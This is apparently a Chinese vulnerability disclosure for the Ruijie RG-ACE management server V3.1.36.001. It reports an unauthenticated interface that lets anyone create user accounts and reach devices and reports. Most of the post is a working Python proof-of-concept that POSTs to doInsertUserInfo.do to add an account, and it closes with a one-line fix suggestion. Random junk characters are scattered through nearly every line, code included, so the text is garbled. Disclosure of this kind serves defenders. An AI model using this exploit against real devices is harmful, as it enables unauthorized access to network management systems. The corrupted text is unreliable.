锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)
# A* l/ L1 c! K" L: ~: Y% N
a) z( K8 {3 w5 U% }$ F: E% b! o, [5 f
测试的具体版本是
' e0 p7 [) |3 V% D产品名称: 锐捷应用控制引擎" D, A2 x' l8 K8 V1 y9 J5 E8 H" K
版本号: 3.1.36.001 TC! N5 f: ^8 c7 i
编译时间: 201104291730
c5 l2 C, n, R8 |
+ ^6 w* Q; e* C3 ?
& V4 R$ x. f# n, H8 k漏洞证明:
9 k: h; G/ ~7 U) T. @! j6 A 9 H- R8 k3 I3 g) ^
: P$ ~, e8 ?( O5 Q- C- S) \8 [0 {
( E, @) h* p9 I
) [: c8 _. h4 H
2 ~- a' b- @% n/ [1 M u1 }$ X执行脚本
9 [/ O9 K3 g6 @( A u7 {! Q#! /usr/bin/env python' N; ]" F# m7 @/ B0 K
#coding=gbk
: Z& u2 E$ x$ u. e, }#RG-ACE管理服务器 V3.1.36.001
% F1 n6 C/ P0 Y+ |% {2 cimport urllib2, urllib,cookielib' S+ k, P$ {) {" |
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
! s5 s9 e+ [3 Ropener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
) l# Z: o, @3 @6 Y( U5 R! l% qopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
" y4 X! [2 U9 j$ M( O2 @! spost=(("event","userManager.doInsertUserInfo"),
2 ^1 J6 O0 S: O/ P; w4 [" X$ J("useractionname","addButtonValue"),
4 {! Z+ F) L( ?+ H1 K("useropermanager","userManager"),
- `# ? x6 C2 |" z' y! H("userName","t"), #######账号自己加3 ^' g1 a/ d' [, v7 d, I2 _
("pwd","aaaaaa"),######密码自己加
. v+ B" j* s4 Y+ y& G$ \5 o("trueName","ad"),
5 d! d& O* d8 A1 J" P( x9 l2 k("email",""),8 n: @0 R1 h. ^2 `
("mobilePhone",""),
7 w5 a9 t& Y8 @! d3 l("officePhone",""),
& T' x8 D1 b. j* V7 K3 n("addr",""),1 y9 e3 s2 j: j, c& C2 I# M
("submit","确定"))
! B g) B8 h" H- |7 E2 f5 kurllib2.install_opener(opener)
8 E* I0 A0 G) G \8 Yp=urllib2.urlopen(url, urllib.urlencode(post)).read()
3 V9 }" A/ m# e2 l# R7 x( vprint "Done"
/ z$ D, c# t q! S+ A7 ?& l
: N* m: O" Z+ W3 ]4 K1 g登录,连接设备
; M/ `' r- R$ f* m' `: l
, w" s" a. P; e9 K& f: D1 ^; o, i
9 ^! \! V* ^$ D/ ?+ Z8 j. y2 [6 |: |- Y r0 q2 X
0 z8 i1 h9 F1 t+ @$ u/ [5 l
默认的管理员admin权限更大点+ k; i$ Z$ V8 @* A7 B
4 t: U3 O& n2 k' D; Q$ ~2 w" [- r) c) [! L! @
- q5 A# G% r$ q5 H8 M
4 i, b F1 s1 f3 |! O ?, w% H3 @8 Y
4 a F( T- r7 q4 h修复方案:
+ B: Q0 p: V! [加强对接口的权限验证. R& e$ j) O. D* ?% N
" |- U2 V: g l/ @ |